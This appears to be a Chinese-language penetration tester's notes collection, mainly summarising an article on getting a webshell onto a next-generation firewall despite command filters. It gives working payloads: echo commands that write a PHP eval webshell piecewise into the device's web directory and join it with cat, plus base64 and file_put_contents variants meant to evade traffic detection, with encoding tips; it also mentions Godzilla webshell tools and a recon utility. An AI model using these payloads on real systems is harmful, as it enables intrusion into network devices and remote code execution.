Quan

看着要上传三个文件才能免杀，好处是最终连接的是哥斯拉的webshell。具体原理实现还没分析

来自华顺信安的一篇文章，绕过某下一代防火墙做的操作，其中提到的限制如下：
1. 无法注入分号截断命令
2. 无法使用 `|| &&` 等特殊符号
3. 想要通过  echo 写入文件时，`>>` 追加写入的方式，不可以，`> `会被截断
4. 较长的 PHP 代码部分，都无法被传入，无法正常解析，需要分段截取写入
5. 传入命令时，需要对特殊字符进行 url 编码
那么如何绕过>>追加写入方式被截断这件事呢，给出了这样的payload
echo -e -n \"<?php \" > /fwlib/sys/virus/webui/svpn_html/1.txt

echo -e -n \"eval\" > /fwlib/sys/virus/webui/svpn_html/2.txt

echo -e -n '($_POST[\"pass' > /fwlib/sys/virus/webui/svpn_html/3.txt

echo -e -n '\"])' > /fwlib/sys/virus/webui/svpn_html/4.txt

echo -e -n \" ?>\" > /fwlib/sys/virus/webui/svpn_html/5.txt

cat /fwlib/sys/virus/webui/svpn_html/1.txt /fwlib/sys/virus/webui/svpn_html/2.txt /fwlib/sys/virus/webui/svpn_html/3.txt /fwlib/sys/virus/webui/svpn_html/4.txt /fwlib/sys/virus/webui/svpn_html/5.txt> /fwlib/sys/virus/webui/svpn_html/xxx.php
确实厉害啊...这个我没能想到
其次对于这个初始化的Webshell在流量侧并不能通过，于是给出了几个解决方案
echo system($_POST[1]("cHdk"));&1=base64_decode
还提到，如果有+号，需要URL编码一下，如果以=或者==结尾，那么就要在等于符号后面再加一个空格，不会存在解析问题，而且还能绕过，很好的Tips
Webshell连接
pass= $_POST[1]($_POST[2],$_POST[3]($_POST[4]));&1=file_put_contents&2=webshell名称.php&3=base64_decode&4=<webshell内容>
这里有个细节：在pass=后面是有一个空格存在的，原因原文有说

这个还在更新，并且内置模板，还没有仔细研究goblin
这个是两年前的项目，没有更新了Pricking 

学哥斯拉的一些东西的时候经常会找一个不错的反编译源码，这个很不错

直接说这个工具解决了我的几个痛点，非常好用
1.信息收集之官网集群
官网里有的时候会有个下级单位要收集，里面有很多的连接，但是我需要再写一个正则来匹配他们才行，这个工具解决了这个问题
2.信息收集之备案
有的时候需要通过备案来查询域名，一般流程是：复制->sublime->GPT写正则->提取。这个工具解决了这个问题
3.产生C段
这个太爽了，某些软件不支持cidr类型的，需要我自己生成然后读文件他去扫描，这个工具解决这个问题(还有一些其他环境)
Github